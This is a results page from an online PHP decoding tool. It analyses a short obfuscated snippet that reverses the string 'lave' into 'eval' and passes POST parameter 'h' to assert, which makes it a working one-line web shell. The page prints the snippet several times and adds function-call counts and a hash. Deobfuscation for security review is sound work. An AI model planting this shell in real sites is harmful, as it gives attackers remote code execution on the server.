Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $a='lave'; $b='($_POST[h])'; $a=strrev($a); @assert($a.$b); ?> ..
Decoded Output download
<?php
$a='lave';
$b='($_POST[h])';
$a=strrev($a);
@assert($a.$b);
?>
Did this file decode correctly?
Original Code
<?php
$a='lave';
$b='($_POST[h])';
$a=strrev($a);
@assert($a.$b);
?>
Function Calls
assert | 1 |
strrev | 1 |
Stats
MD5 | 769a354464d8e9d69038eca3d8c2f96c |
Eval Count | 0 |
Decode Time | 119 ms |